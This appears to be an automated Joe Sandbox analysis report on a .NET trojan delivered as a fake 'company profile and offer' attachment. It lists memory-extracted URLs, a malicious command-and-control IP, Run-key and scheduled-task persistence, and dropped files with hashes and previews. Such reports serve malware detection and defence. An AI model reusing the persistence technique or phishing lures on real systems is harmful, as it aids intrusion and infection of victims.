http://www.sajatypeworks.com	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.647611607.0000000005DF3000.00000004.00000001.sdmp, COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.650357997.0000000005DF6000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.fonts.comic	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.648445406.0000000005E0B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comoH	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677423373.0000000005DF0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.monotype.	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.652891462.0000000005E2D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comm	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677423373.0000000005DF0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cnr	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.649882095.0000000005DFD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.ascendercorp.com/typedesigners.html	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.652015213.0000000005E2D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fonts.com	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.coma	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.647611607.0000000005DF3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.140.53.139	unknown	Sweden		209623	DAVID_CRAIGGG	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356446
Start date:	23.02.2021
Start time:	08:04:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 47s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	COMPANY PROFILE AND DOCUMENTED OFFER.scr (renamed file extension from scr to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@12/12@18/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.3% (good quality ratio 0.3%) Quality average: 57.5% Quality standard deviation: 17.1%
HCA Information:	Successful, ratio: 92% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. TCP Packets have been reduced to 100 Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 168.61.161.212, 92.122.145.220, 104.42.151.234, 51.104.139.180, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:04:55	API Interceptor	948x Sleep call for process: COMPANY PROFILE AND DOCUMENTED OFFER.exe modified
08:05:03	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
08:05:15	API Interceptor	2x Sleep call for process: dhcpmon.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.140.53.139	Quotation ATB-PR28500KINH.exe	Get hash	malicious	Browse
	Quotation ATB-PR28500KINH.exe	Get hash	malicious	Browse
	RFQ-BOHB-SS-FD6L4.exe	Get hash	malicious	Browse
	PURCHASE_FABRICS_APPAREL_100%_COOTON.exe	Get hash	malicious	Browse
	GT-082568-HSO-280820.DOCX.exe	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DAVID_CRAIGGG	Attached file.exe	Get hash	malicious	Browse	185.244.30.113
	UNiOOhIN3e.exe	Get hash	malicious	Browse	185.244.30.241
	BzRmS2LLnB.exe	Get hash	malicious	Browse	91.193.75.94
	bDbA5Bf1k2.exe	Get hash	malicious	Browse	91.193.75.94
	SecuriteInfo.com.BehavesLike.Win32.Generic.dc.exe	Get hash	malicious	Browse	91.193.75.197
	Recibo del env#U00c3o.exe	Get hash	malicious	Browse	91.193.75.17
	Revised Order 193-002.doc	Get hash	malicious	Browse	91.193.75.197
	ynS1BQTyzO.exe	Get hash	malicious	Browse	91.193.75.252
	Quote RF-E79-STD-2021-087.xlsx	Get hash	malicious	Browse	91.193.75.252
	PO57891255564GYH11192643-2152021,pdf.exe	Get hash	malicious	Browse	185.140.53.136
	Attachment.exe	Get hash	malicious	Browse	185.244.30.113
	Query_Ref_CSQ5429996-dtd_0202102021-pdf.jar	Get hash	malicious	Browse	185.244.30.187
	Query_Ref_CSQ5429996-dtd_0202102021-pdf.jar	Get hash	malicious	Browse	185.244.30.187
	DHL_6368638172 receipt document,pdf.exe	Get hash	malicious	Browse	185.140.53.130
	47432000083600.xlsx	Get hash	malicious	Browse	185.244.30.21
	Belegbeleg DHL_119040, pdf.exe	Get hash	malicious	Browse	185.140.53.133
	Purchase Order - 582596.exe	Get hash	malicious	Browse	185.140.53.148
	t1OZOPCkTu.exe	Get hash	malicious	Browse	91.193.75.252
	Ref-Number_MT10300238402293.exe	Get hash	malicious	Browse	185.140.53.134
	Quotation_REF19117030.xlsx	Get hash	malicious	Browse	91.193.75.252

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	520704
Entropy (8bit):	7.472589051984974
Encrypted:	false
SSDEEP:	12288:X9ZObojf4hfvrauupl3CE3aXqoFTxWv0wIG6:PObaGeuuphCE3aXqopYvxIG6
MD5:	589F3EDCF4BCCADDE074ACC68279CAB1
SHA1:	C25F51FB32448D6323344CB2A07771A3908BF682
SHA-256:	F22D8DE0260841FBA148D55CE317AC6A8C27EF46A6CCFB6AD7390EEFE3D463BB
SHA-512:	4770B38D61F52AC3EFDE5C3F01E80C9556DABA3B663ED836B421D69BF244048A5468DB5F40374FABCE900201B445C4EC438CE9DDFEC56AF93B6634B0DE0F7042
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7[4`..............P.............N.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................0.......H........x..tS...............0...........................................0............(....(..........(.....o .........................(!......("......(#......($......(%....N..(....o....(&....&..('.....s(........s)........s........s+........s,............0...........~....o-....+...0...........~....o.....+...0...........~....o/....+...0...........~....o0....+...0...........~....o1....+...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....+...0......

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\COMPANY PROFILE AND DOCUMENTED OFFER.exe.log Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\tmp66DE.tmp Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1645
Entropy (8bit):	5.1820753864715225
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGXItn:cbhK79lNQR/rydbz9I3YODOLNdq3l
MD5:	71FF5915210A631F190918E17AAB2BA3
SHA1:	D686501213D6021737874A2AABE17130FDB70BFC
SHA-256:	AB03E4461B1F19AD17C0D06CED6BAAEE7F85F4C2EFC263C61FB9B58208652460
SHA-512:	9E424DE335F59054FBEB68D0EB569437D08B0FD2FE80D54FCB4C373038EA809EEC8F7218A5665A098D3AFF29E94DB7DF315433AC565ACF5D914E8601263FDF62
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Local\Temp\tmpAD4D.tmp Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1645
Entropy (8bit):	5.1820753864715225
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGXItn:cbhK79lNQR/rydbz9I3YODOLNdq3l
MD5:	71FF5915210A631F190918E17AAB2BA3
SHA1:	D686501213D6021737874A2AABE17130FDB70BFC
SHA-256:	AB03E4461B1F19AD17C0D06CED6BAAEE7F85F4C2EFC263C61FB9B58208652460
SHA-512:	9E424DE335F59054FBEB68D0EB569437D08B0FD2FE80D54FCB4C373038EA809EEC8F7218A5665A098D3AFF29E94DB7DF315433AC565ACF5D914E8601263FDF62
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	data
Category:	dropped
Size (bytes):	928
Entropy (8bit):	7.024371743172393
Encrypted:	false
SSDEEP:	24:IQnybgCUtvd7xCFhwUuQnybgCUtvd7xCFhwUuQnybgCUtvd7xCFhwUuQnybgCUtw:Ik/lCrwfk/lCrwfk/lCrwfk/lCrw8
MD5:	CCB690520E68EE385ACC0ACFE759AFFC
SHA1:	33F0DA3F55E5B3C5AC19B61D31471CB60BCD5C96
SHA-256:	166154225DAB5FCB79C1CA97D371B159D37B83FBC0ADABCD8EBA98FA113A7A3B
SHA-512:	AC4F3CF1F8F460745D37E6350861C2FBCDDCC1BBDE0A48FB361BFBF5B1EBF10A05F798A72CE413FCA073FF8108955353DDBCBD9D50CED6CDAE231C67A28FDDA3
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	ISO-8859 text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:vy9t:vy9t
MD5:	63E7EB01B6D08052B3ED918341F332DB
SHA1:	6BA1077E2EC0D8E8C6466995B4067DBD0A2C2046
SHA-256:	408A4FAFE2D050997BF339892DDCD28B1555753B113B5F40250C5CCD39DBBDE6
SHA-512:	1FACEE73B8EC20A508DCB36CBA4C56278CF08A94243E42B4566D8879E34E5C2909C93A105D1F7B71189187B394DDB9600B1447579FC69EFCE148CDD86C43F5BE
Malicious:	true
Preview:	.P\|V...H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	data
Category:	modified
Size (bytes):	40
Entropy (8bit):	5.153055907333276
Encrypted:	false
SSDEEP:	3:9bzY6oRDT6P2bfVn1:RzWDT621
MD5:	4E5E92E2369688041CC82EF9650EDED2
SHA1:	15E44F2F3194EE232B44E9684163B6F66472C862
SHA-256:	F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
SHA-512:	1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
Malicious:	false
Preview:	9iH...}Z.4..f.~a........~.~.......3.U.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	data
Category:	dropped
Size (bytes):	327432
Entropy (8bit):	7.99938831605763
Encrypted:	true
SSDEEP:	6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
MD5:	7E8F4A764B981D5B82D1CC49D341E9C6
SHA1:	D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
SHA-256:	0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
SHA-512:	880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
Malicious:	false
Preview:	pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...\|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.).....{B.[...y%...i.Q.<..xt.X..H.. ..HF7g...I.3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.\|i4...i...;O...n.?.,. ....v?.5}.OY@.dG\|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...\|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`\|.B....3.....I..o...u1..8i=.z.W..7

C:\Users\user\AppData\Roaming\sjZXfoyePbSa.exe Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	520704
Entropy (8bit):	7.472589051984974
Encrypted:	false
SSDEEP:	12288:X9ZObojf4hfvrauupl3CE3aXqoFTxWv0wIG6:PObaGeuuphCE3aXqopYvxIG6
MD5:	589F3EDCF4BCCADDE074ACC68279CAB1
SHA1:	C25F51FB32448D6323344CB2A07771A3908BF682
SHA-256:	F22D8DE0260841FBA148D55CE317AC6A8C27EF46A6CCFB6AD7390EEFE3D463BB
